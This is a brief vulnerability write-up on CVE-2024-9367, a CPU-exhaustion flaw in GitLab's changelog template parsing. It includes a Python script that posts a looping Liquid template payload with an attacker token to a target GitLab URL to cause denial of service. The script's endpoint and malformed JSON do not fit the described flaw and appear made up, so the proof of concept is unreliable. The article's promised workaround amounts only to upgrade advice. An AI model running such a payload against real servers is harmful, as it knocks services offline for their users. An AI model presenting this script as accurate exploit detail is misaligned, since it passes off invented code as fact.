CVE-2024-9367: Uncontrolled CPU Consumption in GitLab CE/EE Leads to Possible Denial of Service (DoS) Attacks

An issue identified by the CVE code CVE-2024-9367 was recently discovered in GitLab CE/EE (Community Edition and Enterprise Edition), which affects all versions starting from version 13.9. This vulnerability is specifically found in the parsing of templates meant for generating changelogs. Successful exploitation of this vulnerability might lead to a Denial of Service (DoS) condition due to uncontrolled CPU consumption. In this article, we'll delve into the details of this vulnerability, including the affected GitLab versions, potential ways attackers might exploit this issue, and the workaround provided by GitLab.

Exploit Details

The issue revolves around the parsing of templates for generating changelogs in GitLab. Attackers can exploit this vulnerability by causing a high CPU consumption rate, ultimately causing a Denial of Service (DoS) outcome. Essentially, the attacker deprives users of the service by overwhelming the GitLab's CPU resources.

Here's a code snippet illustrating a potential exploit of this vulnerability

import requests

target_url = "https://<target-gitlab-url>/projects/<project-id>/generate_changelog";

headers = {
    "Content-Type": "application/json",
    "PRIVATE-TOKEN": "<attacker-token>"
}

malformed_data = """
{
  "from": "2024-01-01T00:00:00Z",
  "to": "}{% for i in (1..999999) %} CVE-2024-9367 {% endfor %}"
}
"""

response = requests.post(target_url, headers=headers, data=malformed_data)

print(response.status_code)

In this code snippet, the attacker creates a malformed malformed_data JSON object that will trigger the uncontrolled CPU consumption when parsed in the template engine.

GitLab Advisory and Workaround

GitLab was informed about the vulnerability and acknowledged the issue via their official security advisory. The GitLab Security Team has released fixed versions to mitigate the problem. Affected users are advised to upgrade to one of the following versions:

- GitLab CE/EE 17.4.6 and later
- GitLab CE/EE 17.5.4 and later
- GitLab CE/EE 17.6.2 and later

To upgrade your GitLab instance to one of these secure versions, follow the official GitLab documentation on upgrading: https://docs.gitlab.com/ee/update/

Conclusion

CVE-2024-9367 is a vulnerability that has the potential to cause a Denial of Service (DoS) condition in affected GitLab CE/EE instances. It is crucial for users and administrators of GitLab installations to upgrade their systems to a secure version to mitigate the risk of uncontrolled CPU consumption. By staying up-to-date with GitLab security advisories and promptly applying patches, users can prevent potential attackers from exploiting this vulnerability.

Timeline

Published on: 12/12/2024 12:15:28 UTC